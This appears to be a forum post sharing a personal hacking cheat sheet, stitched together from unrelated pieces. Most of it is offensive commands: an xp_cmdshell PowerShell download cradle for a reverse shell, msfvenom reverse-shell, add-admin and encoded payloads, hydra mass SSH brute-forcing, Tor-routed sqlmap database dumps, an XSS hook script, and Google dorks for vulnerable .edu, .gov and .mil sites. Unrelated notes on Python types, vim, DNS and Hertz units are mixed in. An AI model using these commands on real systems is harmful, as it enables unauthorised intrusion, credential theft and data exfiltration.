So I had an old document lying around where I used to write down some important stuff, and I just read it and think these are some good things for a beginner to learn to get familiar with CyberSec.
░██████╗░██████╗░███████╗██╗░░░██╗██╗░░██╗░█████╗░██╗░░░██╗███╗░░██╗██████╗░
██╔════╝░██╔══██╗██╔════╝╚██╗░██╔╝██║░░██║██╔══██╗██║░░░██║████╗░██║██╔══██╗
██║░░██╗░██████╔╝█████╗░░░╚████╔╝░███████║██║░░██║██║░░░██║██╔██╗██║██║░░██║
██║░░╚██╗██╔══██╗██╔══╝░░░░╚██╔╝░░██╔══██║██║░░██║██║░░░██║██║╚████║██║░░██║
╚██████╔╝██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝╚██████╔╝██║░╚███║██████╔╝
░╚═════╝░╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░░╚═════╝░╚═╝░░╚══╝╚═════╝░
forwarding port 8086 "ssh patrick@devzat.htb -i id_rsa -L 8086:127.0.0.1:8086"
sudo tcpdump -i tun0 icmp
x86_64 = 64 bit
amd64 = 64 bit
32-bit = 32 bit
ifconfig / ip a /ping
SMBMAP
sudo smbmap -H 10.10.10.27 -u " " -p " "
sudo smbclient \\\\10.10.10.27\\backups
sudo vim /etc/smb/smb.conf
mssqlclient.py
python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
SELECT IS_SRVROLEMEMBER ('sysadmin')
enable_xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
sudo chmod +x Invoke-PowerShellTcpOneLine.ps1
sudo python3 -m http.server 80
sudo nc -lvnp 443 (netcat)
sudo apt install -y ufw
sudo ufw enable
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
sudo ufw status
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.35/Invoke-PowerShellTcpOneLine.ps1\");""
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
python3 psexec.py administrator@10.10.10.27
TELNET SPOOFING
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit
TELNET BRUTE FORCING
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.196
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
GOBUSTER
(scan for directories) gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.55.56
(scan for subdomains) gobuster vhost -u http://horizontall.htb/ -w /home/greyhound/Desktop/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
(scan for php directories) gobuster dir -u http://10.10.11.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
gobuster dir -u previse.htb -w /opt/directory-list-lowercase-2.3-medium.txt -e -s "200,301,302,401" -x "php" -t 100
sudo wfuzz -c -f subfighter -Z -w /path/to/wordlist -u bolt.htb -H "Host: FUZZ.bolt.htb"
-------------------------------------------------------------------
NMAP
proxychains nmap -Pn -n -sT -sV <target IP>
nmap -sV 192.168.1.0/24 -p 21
nmap -sS -P0 -T1 -n host-a.hackme.org -vv -p 21-25,61,80,139,---AFP---9100
nmap -p80 --script http-waf-detect <host>
nmap -p80 --script http-waf-fingerprint <host>
nmap -sV --script vulners 10.10.10.27
sudo nmap -sS -A -Pn
-------------------------------------------------------------------
FTP/SSH CONNECT
ftp 192.168.1.1
ssh phoenixnap@185.52.53.222 -p22
(commands) get/send file.jpg
-------------------------------------------------------------------
MSFVENOM
(Meterpreter) msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
(Add user) msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
(CMD shell) msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
(Execute command) msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
(Encoder) msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
(Linux payload) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
(Linux payload) msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
(Solaris payload) msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
(MAC reverse shell) msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
(MAC bind shell) msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
-------------------------------------------------------------------
FTP/SERVICE BRUTEFORCING
hydra: hydra -L users.txt -P passwords.txt ftp://192.168.1.1
patator: patator (module ex ftp_login) host=192.168.1.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
-------------------------------------------------------------------
CROSS-SITE SCRIPTING
<script>alert("Hello")</script>
<script src="http://192.168.1.128:3000/hook.js"></script> - (HOOK URL)
<script>document.location.href="https://imgur.com/zSYNKPT"</script>
-------------------------------------------------------------------
SQL INJECTION
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs
sqlmap -r /home/greyhound/Desktop/sql.txt --dbs --fresh-queries
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 --tables
sqlmap -r /home/greyhound/Desktop/sql.txt -D owasp10 -T accounts --dump
sqlmap -u http://192.168.1.205/mutillidae/index.ph...r-info.php --dbs --tor --tor-port=9050 --tor-type=SOCKS5 --random-agent --check-tor
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] --user-agent="unknown"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] --tables --user-agent="permission denied"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin --columns --user-agent="Windows 7 Home Premium"
sqlmap --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -u [URL] -D [DB] -T admin -C email,id,pass,user --dump --user-agent="Fedora 19"
sqlmap -u/r [url/path] --dbs [collect databases]
sqlmap -u/r [url/path] -D [specify db] --tables
sqlmap -u/r [url/path] -D [specify db] -T users --columns
sqlmap -u/r [url/path] -D [specify db] -T users -C email,name,password --dump
-------------------------------------------------------------------
METASPLOIT
use exploit/multi/handler
set Proxies SOCKS5:127.0.0.1:9050
apt update ; apt install metasploit-framework
-------------------------------------------------------------------
KAZAM
Start recording: Super + Ctrl + R.
Pause/resume recording: Super + Ctrl + P.
Finish recording: Super + Ctrl + F.
Quit recording: Super + Ctrl + Q.
-------------------------------------------------------------------
DNS
cat /etc/resolv.conf
cat /etc/network/interfaces
systemctl restart NetworkManager
systemctl restart resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo systemctl enable resolvconf.service
$ sudo systemctl start resolvconf.service
$ sudo systemctl status resolvconf.service
$ sudo nano /etc/resolvconf/resolv.conf.d/head
nameserver 103.86.96.100
nameserver 103.86.99.100
-------------------------------------------------------------------
MACCHANGER
ifconfig eth0 down/up
macchanger -r eth0
-------------------------------------------------------------------
NIKTO
nikto -h 192.168.18.132 -p 80,443 -Format msf+
nikto -h 192.168.18.132 -p 80,443 -o /home/greyhound/Desktop/scan
nikto -dbcheck -Display V -evasion 1 -Format csv -host 34.89.105.48 -p 80,433 -o /home/greyhound/Desktop/docs -Pause 5
nikto -h 34.89.105.48 -p 80,443 -o /home/greyhound/Desktop/docs -Display on
-------------------------------------------------------------------
PROGRAMS GENERAL
hydra (password cracking over protocols)
john the ripper (password/hash cracking)
wfuzz (fuzzing)
dirb (scanner)
Metagoofil (metadata collector)
gobuster (bruteforce URIs, DNS subdomains, Virtual Host names on target web servers, Open Amazon S3 buckets)
-------------------------------------------------------------------
PROGRAMMING GENERAL
variable = "1" (pointing somewhere)
float = 1.1
integer = 1
boolean = true/false
a=10, b="string" = a,b = variables
function(arg1,arg2,arg3) = function
arg = An argument is the value that is sent to the function when it is called
function = A function is a block of code which only runs when it is called.
-------------------------------------------------------------------
HYDRA
-l -> Specify a username to use during brute force attack
-L -> Specify a wordlist of usernames to be used during the bruteforce attack
-p -> Specify a password to use during brute force attack
-P -> Specify a wordlist of passwords to be used during the bruteforce attack
(SSH BRUTEFORCE) $ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh
(SSH BRUTEFORCE) $ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh
(SSH MASS BRUTEFORCE)$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh
-V verbose
-------------------------------------------------------------------
WEBSITES
https://backend.eventz.today/feeds/59ae8...on?lang=fi 18.158.93.8
https://archive.org/
https://www.yougetsignal.com/tools/web-s...eb-server/
https://sitereport.netcraft.com/
http://www.securityidiots.com/Web-Pentest
https://www.sciencedirect.com/topics/com...ence/nikto
ONLINE CRACKING
www.crackstation.net
www.cloudcracker.com
www.hash-cracker.com
www.onlinehashcrack.com
www.hashkiller.co.uk
-------------------------------------------------------------------
METASPLOITABLE
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 15:27 GMT
Nmap scan report for 192.168.1.205
Host is up (0.0027s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.07 seconds
HERTZ UNITS
kHz – kilohertz – 1 000 Hz
MHz – megahertz – 1 000 000 Hz
GHz – gigahertz – 1 000 000 000 Hz
THz – terahertz – 1 000 000 000 000 Hz
-------------------------------------------------------------------
PYTHON
virtualenv flask
source bin/activate
python3 -m venv venv
source venv/bin/activate
In Python, the data type is set when you assign a value to a variable:
x = "Hello World" str
x = 20 int
x = 20.5 float
x = 1j complex
x = ["apple", "banana", "cherry"] list
x = ("apple", "banana", "cherry") tuple
x = range(6) range
x = {"name" : "John", "age" : 36} dict
x = {"apple", "banana", "cherry"} set
x = frozenset({"apple", "banana", "cherry"}) frozenset
x = True bool
x = b"Hello" bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
If you want to specify the data type, you can use the following constructor functions:
x = str("Hello World") str
x = int(20) int
x = float(20.5) float
x = complex(1j) complex
x = list(("apple", "banana", "cherry")) list
x = tuple(("apple", "banana", "cherry")) tuple
x = range(6) range
x = dict(name="John", age=36) dict
x = set(("apple", "banana", "cherry")) set
x = frozenset(("apple", "banana", "cherry")) frozenset
x = bool(5) bool
x = bytes(5) bytes
x = bytearray(5) bytearray
x = memoryview(bytes(5)) memoryview
-------------------------------------------------------------------
I tried a lot of things but no way.
I tried to make a php file with the content upload.php running in localhost
php -S 127.0.0.1:1989 upload.php
I used curl http://<ip machine> -v
I figured out the machine time
I adjusted my local machine time to the machine time
and ran this
while true; do curl http://127.0.0.1:1989 ; done > image_name.txt
When the command was running I uploaded my image to the target machine, then I stopped the above command.
I got a lot of names with different hashes. I tried each name in ip/images/uploads, nothing.
And tried all names in LFI, nothing also..
Any idea? !!!
-------------------------------------------------------------------
VIM
save: :w
save and exit: :wq
exit: :q
force: ! (example :w! :q!)
vertical split: open a document and then type :vsplit /path-to-document/document and this will open the specified document and split the screen so you can see both documents.
copy: y
copy a line: yy
paste: p
cut: d
cut a line: dd
-------------------------------------------------------------------
GOOGLE DORK (SQL)
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
GOOGLE DORK
site:.edu “phone number” – This Dork searches for websites on .edu domains that contain the words “phone number”.
student “phone number” – This Dork searches for websites on .edu domains that contain the words “student” and “phone number”.
inurl:edu “login” – This Dork searches for websites on .edu domains that contain the words “login”. This Dork searches for school websites that contain student login information.
“powered by vbulletin” site:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.gov – This Dork searches for websites on .gov domains that contain the words “powered by vbulletin”. This Dork searches for governmental websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
inurl:.com “powered by vbulletin” – This Dork searches for websites on .com domains that contain the words “powered by vbulletin”. This Dork searches for websites that are running on the vbulletin forum software.
inurl:.edu “register forum” – This Dork searches for websites on .edu domains that contain the words “register forum”. This Dork searches for school websites that allow you to register for a forum.
inurl:.gov “register forum” – This Dork searches for websites on .gov domains that contain the words “register forum”. This Dork searches for governmental websites that allow you to register for a forum.